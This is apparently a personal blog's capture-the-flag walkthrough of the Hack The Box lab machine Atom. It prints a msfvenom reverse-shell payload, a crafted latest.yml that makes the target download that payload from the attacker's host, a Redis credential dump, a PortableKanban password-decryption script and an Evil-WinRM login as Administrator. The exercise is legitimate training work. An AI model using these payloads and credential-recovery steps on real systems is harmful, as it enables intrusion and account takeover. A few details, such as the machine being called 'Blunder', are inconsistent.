3rd August 2021
Hack The Box Atom Write-Up by T13nn3s

Hack The Box Write-Up Atom – 10.10.10.237

It’s the right idea, but not the right time

John Dalton

About Atom

In this post, I’m writing a write-up for the machine Atom from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Blunder is a ‘Medium’ rated box. On the release of this machine it was rated as an ‘Easy’ difficulty machine, and later on (April 17th, 2021) this machine’s difficulty is updated to Medium difficulty. Grabbing and submitting the user.txt flag, your points will be raised by 15, and submitting the root flag your points will be raised by 30.

Foothold
The initial port scan with Nmap is finding three open ports. Two ports 80/tcp and 443/tcp are related to a web service and the last one is 445/tcp the port which is used by the SMB-protocol. After enumerating the SMB-protocol we can find a PDF file which is talking about electron-builder. After some searching online we can find a Remote Code Execution vulnerability in version 1.2.3 in the Electron Updater.

User
We can create a reverse shell payload with msfvenom and use the latest.yml file to let the machine download this payload to get a reverse shell. After the reverse shell, we are authenticated as the user jason on this machine.

Root
In the Downloads folder of the user Jason, we can find a directory called PortableKanban. After some searching on the internet, we can find a password decryption vulnerability in this application. After further searching, we can also find that Redis Server is installed on this machine. Through the configuration files of Redis, we can find a password. With this password, we can establish a connection with the redis-cli to this machine. With redis-dump, we can dump the keys and hashes and we have an encrypted password for the user account Administrator. After doing some modifications to the password decryption script related to PortaleKanban we can establish an Evil-WinRM session to the machine and own Atom.

Machine Info

Hack The Box Atom Write-Up by T13nn3s
Hack The Box Atom Write-Up by T13nn3s
Hack The Box Atom Machine IP and maker
Hack The Box Atom Machine IP and maker

Reconnaissance

Port scan

Let’s start with a port scan with Nmap.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# nmap -sC -sV -oA./nmap/10.10.10.237 10.10.10.237

The results.

Nmap scan report for atom.htb (10.10.10.237)
Host is up (0.067s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods: 
|_  Potentially risky methods: TRACE
|http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions 135/tcp open  msrpc        Microsoft Windows RPC 
443/tcp open  ssl/http     Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) 
| http-methods:  
|  Potentially risky methods: TRACE
|http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 
|_http-title: Heed Solutions 
| ssl-cert: Subject: commonName=localhost 
| Not valid before:
2009-11-10T23:48:47 
|_Not valid after:  2019-11-08T23:48:47 
|_ssl-date: TLS randomness does not represent time 
| tls-alpn:  |  http/1.1
445/tcp open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|clock-skew: mean: 2h24m08s, deviation: 4h02m32s, median: 4m06s 
| smb-os-discovery:  
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3) 
|   OS CPE: cpe:/o:microsoft:windows_10::- 
|   Computer name: ATOM 
|   NetBIOS computer name: ATOM\x00 
|   Workgroup: WORKGROUP\x00 
|  System time: 2021-06-04T12:24:35-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-06-04T19:24:35
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Fri Jun  4 15:21:04 2021 -- 1 IP address (1 host up) scanned in 63.26 seconds

Well, we have some results. Let’s read it carefully. First, we can determine the open ports. The first discovered open port is 80/tcp, there is running a website behind this port, running on Apache/2.4.46. The website has the HTTP title Heed Solutions. Also, the HTTPS port 443/tcp is pointing to the same website. The third open port is 139/tcp, which is the default Windows RPC port, through this protocol we can try to enumerate the system and users. 445/tcp is the default port for SMB, a file share protocol used by Microsoft operating systems. Through the open SMB port, we see that this machine is running Windows 10 Pro 19042, this is the 20H2 build of Windows 10, released in October 2020. This information was available through the user account guest, we keep that account name in our mind.

After adding the hostname atom.htb to our hosts’ file, we can visit the website on https://atom.htb. First, we checked the self-signed certificate for information, but there is no email address or something visible. We have checked the website, it’s not giving much information, than only is a website for a software application. The Windows download button leads us to https://atom.htb/releases/heed_setup_v1.0.0.zip, to download a little application.

Hack The Box Atom Website

As the website is not giving us enough information to proceed on, we jump over to the next protocol: Server Message Block (SMB).

Enumerating SMB

Let’s start with smbmap, to check for available shares. We do this with the useraccount Guest.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# smbmap -H 10.10.10.237 -u guest
[+] IP: 10.10.10.237:445        Name: atom.htb                                           
             Disk     Permissions        Comment     
             ----     ----------- -------     
            ADMIN$     NO ACCESS     Remote Admin
            C$     NO ACCESS     Default share
            IPC$     READ ONLY    Remote IP
            Software_Updates     READ, WRITE

Let’s access those shares with smbclient.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# smbclient //atom.htb/Software_Updates
Enter WORKGROUP\root's password: 
Try "help" to get a list of possible commands.
smb: > recurse on
smb: > ls
  .                                   D        0  Sat Jun  5 10:26:25 2021
  ..                                  D        0  Sat Jun  5 10:26:25 2021
  client1                             D        0  Sat Jun  5 10:26:25 2021
  client2                             D        0  Sat Jun  5 10:26:25 2021
  client3                             D        0  Sat Jun  5 10:26:25 2021
  UAT_Testing_Procedures.pdf          A    35202  Fri Apr  9 07:18:08 2021
\client1
  .                                   D        0  Sat Jun  5 10:26:25 2021
  ..                                  D        0  Sat Jun  5 10:26:25 2021
\client2
  .                                   D        0  Sat Jun  5 10:26:25 2021
  ..                                  D        0  Sat Jun  5 10:26:25 2021
\client3
  .                                   D        0  Sat Jun  5 10:26:25 2021
  ..                                  D        0  Sat Jun  5 10:26:25 2021
             4413951 blocks of size 4096. 1368892 blocks available

There is a UAT_Testing_Procedures.pdf file. With get we can download this file to our system.

smb: > get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (59.4 KiloBytes/sec) (average 59.4 KiloBytes/sec)
Hack The Box Atom Heed Solutions PDF file
UAT_Testing_Procedures.pdf

The UAT_Testing_Procedures.pdf is talking about electron-builder, is that the application which is being offered as a download from the website? After spending some time on the internet, I found an article that there is an application Electron Updater, which has a Remote Code Execution vulnerability in version 1.2.3. Found the information in this article: https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html. This article is also talking about how to exploit this vulnerability.

Exploit

Electron-Updater Remote Code Execution

Let’s create out latest.yaml file, with a reverse shell payload. First, let’s create our reverse shell payload with msfvenom.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.184 LPORT=4444 -f exe > "s'hell.exe" 
 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
 [-] No arch selected, selecting arch: x86 from the payload
 No encoder specified, outputting raw payload
 Payload size: 324 bytes
 Final size of exe file: 73802 bytes

We can now calculate our sha512 checksum and convert it to a base64 encoded format.

┌──(root💀kali)-[/home/…/htb/machines/atom/http]
└─# shasum -a 512 "s'hell.exe" | cut -d " " -f1 | xxd -r -p | base64
yk6irOV/MlSY5BEDFR2aXg+41HTSyB0ggJBDXrcbJ0hVzaXS/gRNapGMtHElyXJqme4tgjiSFXrIG3LDx9a/gQ==

We can now create our latest.yml file to call our malicious reverse shell.

version: 1.2.3
 files:
   path: http://10.10.16.184/s'hell.exe
   sha512: yk6irOV/MlSY5BEDFR2aXg+41HTSyB0ggJBDXrcbJ0hVzaXS/gRNapGMtHElyXJqme4tgjiSFXrIG3LDx9a/gQ==

We can now put our latest.yml in the //atom.htb/Software_Updater share and wait with our listener for a reverse shell with Meterpreter. After some tries, I found out that the payload has to be uploaded to the /client1 folder.

Shell as jason

After a minute waiting, the reverse shell is established.

┌──(root💀kali)-[/home/…/htb/machines/atom/http]
└─# msfconsole
...
msf6 exploit(multi/handler) > use payload/windows/x64/shell_reverse_tcp
msf6 payload(windows/x64/shell_reverse_tcp) > set lhost => 10.10.16.184
lhost => 10.10.16.184
msf6 exploit(multi/handler) > use exploit/multi/handler
msf6 exploit(multi/handler) > set lhost 10.10.16.184
set lhost => 10.10.16.184
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.16.184:4444 
[] Started reverse TCP handler on 10.10.16.184:4444  [] Command shell session 1 opened (10.10.16.184:4444 -> 10.10.10.237:62620) at 2021-06-12 15:00:29 -0400
C:\WINDOWS\system32>whoami
whoami
atom\jason

Let’s check if we can grab the user flag.

C:\WINDOWS\system32>cd C:\users\jason\desktop
cd C:\users\jason\desktop
C:\Users\jason\Desktop>type user.txt
type user.txt
ad465995baf522de057af9227154a770
C:\Users\jason\Desktop>

Nice! We have the user flag! We can now proceed to the next step: do a privilege escalation.

Privilege Escalation

Enumeration

We can now start to do some enumeration on this machine to escalate our privileges to administrator. We start with checking the installed applications and we can find that Redis is installed on this machine. Redis Server is default using port 6379/tcp, we have missed this port on our initial port scan. With netstat we can determine if this port is open.

PS C:\Program Files\Redis> netstat -ano | findstr "6379" 
netstat -ano | findstr "6379"
TCP    0.0.0.0:6379           0.0.0.0:0              LISTENING       1824
TCP    [::]:6379              [::]:0                 LISTENING       1824

There is also a file listed in the Downloads folder with the name PortableKanban. On exploit-DB, I found a script for encrypted password retrieval: https://www.exploit-db.com/exploits/49409. Maybe this is our way to root, but let’s check further first.

PS C:\Users\jason\Downloads> ls

Directory: C:\Users\jason\Downloa
Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
d-----         3/31/2021   2:36 AM                node_modules                                                         
d-----          4/2/2021   8:21 PM                PortableKanban

Ok, let’s check the configuration files of Redis for more information. We can find a clear text password in the redis.windows.conf file.

PS C:\Program Files\Redis> cat redis.windows.conf                                                                                                                                                              
cat redis.windows.conf                                                                                                                                                                                         
Redis configuration file example
requirepass kidvscat_yes_kidvscat                                                                                                                                                                              
Note on units: when memory size is needed, it is possible to specify

We have now the password kidvscat_yes_kidvscat. Well, let’s install redis-tools and check whether we can create a redis-cli session from our machine.

┌──(root💀kali)-[/home/…/htb/machines/atom/http]
└─# sudo apt-get install redis-tools

We have now the utillity redis-cli at our disposal. Let’s connect to Redis with the founded password.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# redis-cli -h atom.htb -p 6379 --pass kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
atom.htb:6379>

Yes! We have a connection to the machine through the redis-cli. After some searching on the internet, I found a way to some interesting information from Redis. Through the command below, we can learn that there are 4 keys stored in db0.

atom.htb:6379> INFO
...
# Cluster
cluster_enabled:0
Keyspace
db0:keys=4,expires=0,avg_ttl=0

We know that db0 is holding 4 keys, let’s dump this whole database and check if we can find some more information. For this purpose, we need to install redis-dump. Before we can install that utility we need to install the package manager npm.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# apt-get install npm

Then install redis-dump.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# npm install redis-dump -g

Dump database with redis-dump

We can now dump the contents of db0. Default redis-dump is using db0, so we do not have to specifiy a database.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# redis-dump -h atom.htb -p 6379 -a kidvscat_yes_kidvscat > database0.txt

Let’s now check the contents of the database0.txt file.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# cat database0.txt 
DEL     pk:ids:MetaDataClass
SADD    pk:ids:MetaDataClass ffffffff-ffff-ffff-ffff-ffffffffffff
DEL     pk:ids:User
SADD    pk:ids:User e8e29158-d70d-44b1-a1ba-4949d52790a0
SET     pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff {"Id":"ffffffffffffffffffffffffffffffff","SchemaVersion":"4.2.0.0","SchemaVersionModified":"\/Date(1617420120000-0700)\/","SchemaVersionModifiedBy":"e8e29158d70d44b1a1ba4949d52790a0","SchemaVersionChecked":"\/Date(-62135596800000-0000)\/","SchemaVersionCheckedBy":"00000000000000000000000000000000","TimeStamp":637530169345346438}'
SET     pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0 '{"Id":"e8e29158d70d44b1a1ba4949d52790a0","Name":"Administrator","Initials":"","Email":"","EncryptedPassword":"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi","Role":"Admin","Inactive":false,"TimeStamp":637530169606440253}'

We have found an encrypted password Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi for the user account Administrator.

We need first to install the des module.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# python3 -m pip install des

The next step is that we have to modify the Python script which can decrypt the password. After some testing and finetuning, I came up with this script.

import json
import base64
from des import * #python3 -m pip install des
import sys

def decode(hash):
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    return key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8')

print(decode("Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi"))

We can now run this script to decode the encrypted password.

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# python3 49409.py
[email protected]

Nice! We have now decrypted the password. Let’s try to make an connection with evil-winrm.

Own Atom

┌──(root💀kali)-[/home/kali/htb/machines/atom]
└─# evil-winrm -u Administrator -p "[email protected]" -i atom.htb

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop; cat root.txt
a6599aeacd370059e059aac20be44561
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

We have rooted Atom! Did you like this write-up? Please consider spending a respect point, it means a lot to me. My Hack The Box profile: https://app.hackthebox.eu/profile/224856.

Happy hacking!

T13nn3s

I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *